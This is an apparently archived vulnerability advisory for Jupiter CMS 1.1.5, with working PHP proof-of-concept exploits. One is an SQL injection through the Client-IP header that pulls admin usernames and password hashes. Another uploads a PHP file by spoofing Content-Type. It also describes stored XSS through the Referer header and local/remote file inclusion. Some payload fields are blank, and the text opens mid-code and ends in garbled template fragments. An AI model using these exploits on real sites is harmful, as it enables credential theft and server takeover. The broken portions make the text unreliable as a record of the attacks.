|
Title: Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID: 12070214
Risk level: High
Author: DarkFig
exit;
}
magic_quotes_gpc is not applied to $_SERVER array, so this can lead to SQL
Injection attack even if magic_quotes_gpc = On. One result of the SQL request
is returned to the user, so this is a simple SQL Injection (not a blind). This
simple poc illustrate how an attacker can exploit this vulnerability:
# SQL Injection Vulnerability (POC #1)
#
require("phpsploitclass.php"); # See [1]
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$hev = "-1' UNION SELECT CONCAT('"
."[BEGIN_XPL_USER]',"
."(SELECT username FROM users LIMIT 0,1),'"
."[END_XPL_USER]','"
."[BEGIN_XPL_PWD]',"
."(SELECT password FROM users LIMIT 0,1),'"
."[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP",$hev);
$xpl->get($url);
preg_match("#\[BEGIN_XPL_USER\](.*)\[END_XPL_USER\]#",$xpl->getcontent(),$usr);
preg_match("#\[BEGIN_XPL_PWD\]([a-z0-9]{32})\[END_XPL_PWD\]#",$xpl->getcontent(),$pwd);
print $usr[1].'::'.$pwd[1];
#
# EOF POC #1
.: [ VULN #2 ]
Risk level: High
Summary: File Upload Vulnerability
Conditions: register_globals = On
All scripts situated in the "modules" directory can be executed by a guest,
for example let's see "modules/emoticons.php" access protection :
if(isset($is_guest) || isset($is_user))
{ header("location: $PHP_SELF?i=2"); exit; }
An attacker can access to this script, simply by sending a GET request
which contains the "is_guest" and "is_user" variables. For the most part of
the time, this is not critical because the script use several functions
stored in other files (not include), this return a Fatal Error. But if the
"a" parameter is set to 1 the script "modules/emoticons.php" let us upload
a file, before producing a Fatal Error. Let's see the upload protection:
$allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png');
if(!in_array($uploaded_file['type'],$allowed_types)){
header("location: $PHP_SELF?n=modules/emoticons&i=30");exit;
}
So what we have to do to bypass this protection, is just to modify the
"Content-Type" header. This poc illustrate how an attacker can upload a
malicious php file:
# File Upload Vulnerability (POC #2)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url,
"is_guest" => 1,
"is_user" => 1,
"a" => 1,
"req_file" => array(frmdt_filename => "iamaphpfile.php",
frmdt_type => "image/jpeg",
frmdt_content => ""));
$xpl->formdata($arr);
$xpl->get($url.'images/emoticons/iamaphpfile.php');
print($xpl->getcontent());
#
# EOF POC #2
.: [ VULN #3 ]
Risk level: Low
Summary: "Logged Guests" XSS
Conditions: None
The script "index.php" insert (in the database) some informations sent by
the web browser.
if(!isset($_SESSION['in_site']))
{
$db->insertRow("online",array('sid' => ''.$session_id.'',
'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL,
'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL,
'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'',
'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'',
'lang' => ''.$lang.'','date' => ''.time().''));
$db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log',
'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization' => NULL,
'user_email' => NULL,'user_hideemail' => NULL,'user_flag' => NULL,'user_location' => NULL,
'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'',
'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' => ''.$lang.'',
'date' => ''.time().''));
$_SESSION['in_site'] = 1;
}
All data inserted in the database are protected against SQL Injection attacks,
however they're not protected against XSS. This is a permanent XSS, the malicious
code will be executed when the admin will click on "Logged Guest". Proof of concept:
# "Logged Guest" XSS Vulnerability (POC #3)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->addheader("Referer", "");
$xpl->get($url);
#
# EOF POC #3
.: [ VULN #4 ]
Risk level: High
Summary: Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off
RFI: PHP >= 5.0.0, allow_url_fopen = On
The script "index.php" contains the following code:
if(isset($n))
{
if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");
}
The "n" parameter isn't properly filtered, this can lead to file inclusion.
Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00
is required. Remote file inclusion will work if the server is running on PHP >= 5.
In this version, the file_exists() function can be used with some URL wrappers,
you can use ftp:// for example. Simple poc:
LFI: http://= $language['Bans name']
= $language['Bans title'] ?> <
= $language['Bans desc'] ?> = $ban_ip_check['ip
= $language['Bans title2'] ?>